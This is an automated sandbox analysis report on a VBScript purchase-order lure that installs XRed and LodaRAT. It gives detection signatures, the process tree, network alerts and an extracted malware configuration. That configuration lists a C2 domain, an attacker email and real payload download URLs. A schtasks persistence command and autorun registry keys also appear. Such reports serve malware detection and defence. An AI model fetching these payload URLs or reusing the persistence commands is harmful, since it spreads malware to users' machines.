Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order Summary Details.vbs

Overview

General Information

Sample name:Purchase Order Summary Details.vbs
Analysis ID:1582353
MD5:f86e6209572e4aa47973b354ce16342f
SHA1:651a612eb8b23c243341710deafe8b8032aabf09
SHA256:b5dcbbec05c4132e2221ee1be9a68d1ef4b0772a8568eab50f52ecbccca2c30d
Tags:knkbkk212vbsxred-mooo-comuser-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7344 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • update.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 1585CB2963DCEB92FBCF6C4C057E191E)
  • update.exe (PID: 7580 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 1585CB2963DCEB92FBCF6C4C057E191E)
  • update.exe (PID: 7640 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 1585CB2963DCEB92FBCF6C4C057E191E)
    • ._cache_update.exe (PID: 7720 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: 66A4951D384B55633AB61ADD85514F07)
      • cmd.exe (PID: 7928 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7988 cmdline: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7960 cmdline: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 7792 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)
      • WerFault.exe (PID: 8448 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 4704 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 8680 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 3044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7872 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • DELPQB.exe (PID: 8156 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: 66A4951D384B55633AB61ADD85514F07)
  • DELPQB.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: 66A4951D384B55633AB61ADD85514F07)
  • DELPQB.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: 66A4951D384B55633AB61ADD85514F07)
  • Synaptics.exe (PID: 4312 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)
  • DELPQB.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: 66A4951D384B55633AB61ADD85514F07)
  • ._cache_update.exe (PID: 5124 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: 66A4951D384B55633AB61ADD85514F07)
  • DELPQB.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: 66A4951D384B55633AB61ADD85514F07)
  • DELPQB.exe (PID: 8488 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: 66A4951D384B55633AB61ADD85514F07)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XRedYara detected XRedJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\WLJOQW.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
      C:\ProgramData\Synaptics\RCX8AC4.tmpJoeSecurity_XRedYara detected XRedJoe Security
        C:\ProgramData\Synaptics\RCX8AC4.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\Users\user\Documents\DVWHKMNFNN\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\DVWHKMNFNN\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              Click to see the 6 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000007.00000002.3025260757.000000000495E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000000.00000003.1766802777.000002235F9C0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                      00000000.00000003.1764738724.000002235FCCB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                        Click to see the 13 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        1.0.update.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                          1.0.update.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                            0.3.wscript.exe.2235fd7e684.0.unpackJoeSecurity_XRedYara detected XRedJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Potentially Suspicious Malware Callback Communication
                              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Initiated: true, ProcessId: 7720, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49754
                              Sigma detected: Script Initiated Connection to Non-Local Network
                              Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7344, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                              Sigma detected: Script Interpreter Execution From Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 7720, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 7960, ProcessName: wscript.exe
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 7720, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 7960, ProcessName: wscript.exe
                              Sigma detected: WScript or CScript Dropper
                              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", ProcessId: 7344, ProcessName: wscript.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ProcessId: 7720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WLJOQW
                              Sigma detected: Script Initiated Connection
                              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7344, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                              Sigma detected: Startup Folder File Write
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7344, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                              Sigma detected: Suspicious Schtasks From Env Var Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7928, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ProcessId: 7988, ProcessName: schtasks.exe
                              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", ProcessId: 7344, ProcessName: wscript.exe
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, ProcessId: 7640, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Sigma detected: Office Macro File Creation
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7792, TargetFilename: C:\Users\user\AppData\Local\Temp\zuYOpErC.xlsm

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:48:01.491903+010020448871A Network Trojan was detected192.168.2.449744142.250.185.78443TCP
                              2024-12-30T11:48:01.546642+010020448871A Network Trojan was detected192.168.2.449743142.250.185.78443TCP
                              2024-12-30T11:48:02.489318+010020448871A Network Trojan was detected192.168.2.449749142.250.185.78443TCP
                              2024-12-30T11:48:02.553422+010020448871A Network Trojan was detected192.168.2.449752142.250.185.78443TCP
                              2024-12-30T11:48:03.503871+010020448871A Network Trojan was detected192.168.2.449755142.250.185.78443TCP
                              2024-12-30T11:48:03.616629+010020448871A Network Trojan was detected192.168.2.449757142.250.185.78443TCP
                              2024-12-30T11:48:04.642336+010020448871A Network Trojan was detected192.168.2.449760142.250.185.78443TCP
                              2024-12-30T11:48:04.767565+010020448871A Network Trojan was detected192.168.2.449762142.250.185.78443TCP
                              2024-12-30T11:48:06.298652+010020448871A Network Trojan was detected192.168.2.449772142.250.185.78443TCP
                              2024-12-30T11:48:06.302375+010020448871A Network Trojan was detected192.168.2.449771142.250.185.78443TCP
                              2024-12-30T11:48:07.281227+010020448871A Network Trojan was detected192.168.2.449776142.250.185.78443TCP
                              2024-12-30T11:48:07.370368+010020448871A Network Trojan was detected192.168.2.449778142.250.185.78443TCP
                              2024-12-30T11:48:08.352149+010020448871A Network Trojan was detected192.168.2.449779142.250.185.78443TCP
                              2024-12-30T11:48:08.371820+010020448871A Network Trojan was detected192.168.2.449781142.250.185.78443TCP
                              2024-12-30T11:48:09.381098+010020448871A Network Trojan was detected192.168.2.449784142.250.185.78443TCP
                              2024-12-30T11:48:09.394753+010020448871A Network Trojan was detected192.168.2.449785142.250.185.78443TCP
                              2024-12-30T11:48:10.952210+010020448871A Network Trojan was detected192.168.2.449794142.250.185.78443TCP
                              2024-12-30T11:48:10.953008+010020448871A Network Trojan was detected192.168.2.449795142.250.185.78443TCP
                              2024-12-30T11:48:11.939764+010020448871A Network Trojan was detected192.168.2.449797142.250.185.78443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:48:01.977556+010028221161Malware Command and Control Activity Detected192.168.2.449754172.111.138.1005552TCP
                              2024-12-30T11:48:38.269200+010028221161Malware Command and Control Activity Detected192.168.2.450010172.111.138.1005552TCP
                              2024-12-30T11:49:14.488094+010028221161Malware Command and Control Activity Detected192.168.2.450304172.111.138.1005552TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:48:01.945046+010028326171Malware Command and Control Activity Detected192.168.2.44974769.42.215.25280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.450304172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.449754172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.449848172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.449911172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.450308172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.450010172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.449800172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.450309172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.450277172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.450207172.111.138.1005552TCP
                              2024-12-30T11:47:34.387955+010028498851Malware Command and Control Activity Detected192.168.2.450099172.111.138.1005552TCP
                              2024-12-30T11:48:01.977556+010028498851Malware Command and Control Activity Detected192.168.2.449754172.111.138.1005552TCP
                              2024-12-30T11:48:11.060537+010028498851Malware Command and Control Activity Detected192.168.2.449800172.111.138.1005552TCP
                              2024-12-30T11:48:20.144056+010028498851Malware Command and Control Activity Detected192.168.2.449848172.111.138.1005552TCP
                              2024-12-30T11:48:29.192491+010028498851Malware Command and Control Activity Detected192.168.2.449911172.111.138.1005552TCP
                              2024-12-30T11:48:38.269200+010028498851Malware Command and Control Activity Detected192.168.2.450010172.111.138.1005552TCP
                              2024-12-30T11:48:47.316580+010028498851Malware Command and Control Activity Detected192.168.2.450099172.111.138.1005552TCP
                              2024-12-30T11:48:56.378243+010028498851Malware Command and Control Activity Detected192.168.2.450207172.111.138.1005552TCP
                              2024-12-30T11:49:05.472424+010028498851Malware Command and Control Activity Detected192.168.2.450277172.111.138.1005552TCP
                              2024-12-30T11:49:14.488094+010028498851Malware Command and Control Activity Detected192.168.2.450304172.111.138.1005552TCP
                              2024-12-30T11:49:30.675751+010028498851Malware Command and Control Activity Detected192.168.2.450308172.111.138.1005552TCP
                              2024-12-30T11:49:39.770026+010028498851Malware Command and Control Activity Detected192.168.2.450309172.111.138.1005552TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\RCX8AC4.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX8AC4.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\AppData\Local\Temp\WLJOQW.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Found malware configuration
                              Source: 0.3.wscript.exe.2235fd7e684.0.unpackMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX8AC4.tmpReversingLabs: Detection: 100%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1ReversingLabs: Detection: 100%
                              Multi AV Scanner detection for submitted file
                              Source: Purchase Order Summary Details.vbsVirustotal: Detection: 42%Perma Link
                              Source: Purchase Order Summary Details.vbsReversingLabs: Detection: 26%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.2% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1Joe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\RCX8AC4.tmpJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49743 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49750 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49749 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49751 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49752 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49772 version: TLS 1.2
